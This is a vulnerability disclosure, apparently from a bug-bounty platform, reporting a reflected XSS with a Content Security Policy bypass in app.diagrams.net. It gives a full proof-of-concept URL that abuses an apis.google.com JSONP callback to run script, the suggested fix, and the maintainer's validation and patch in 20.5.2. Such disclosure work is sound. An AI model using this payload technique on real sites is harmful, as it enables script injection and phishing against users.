XSS and CSP bypass in app.diagrams.net in jgraph/drawio

Valid

Reported on

Nov 4th 2022


Description

The application reflects an input from the url without sanitizing it. With a csp bypass from apis.google.com its possible to execute javascript code.

Proof of Concept

https://app.diagrams.net/?ui=min&p=tickets#_TICKETS%7B%22ticketsConfig%22%3A%7B%22deskApiKey%22%3A%22teste%22%2C%22deskDomain%22%3A%22teste\%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz%26%23x22;-alert(document.domain)-%26%23x22;%3E%3C/script%3E%27%3Easdfasdf%22%7D%7D

Impact

XSS, Phishing

Occurrences

A fix would be use mxUtils.htmlEntities(var), as it used in other places

We are processing your report and will contact the jgraph/drawio team within 24 hours. a month ago
David Benson validated this vulnerability 25 days ago

Another good catch

Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.5.2 with commit d37894 24 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
tickets.js#L83 has been validated
David Benson published this vulnerability 24 days ago
to join this conversation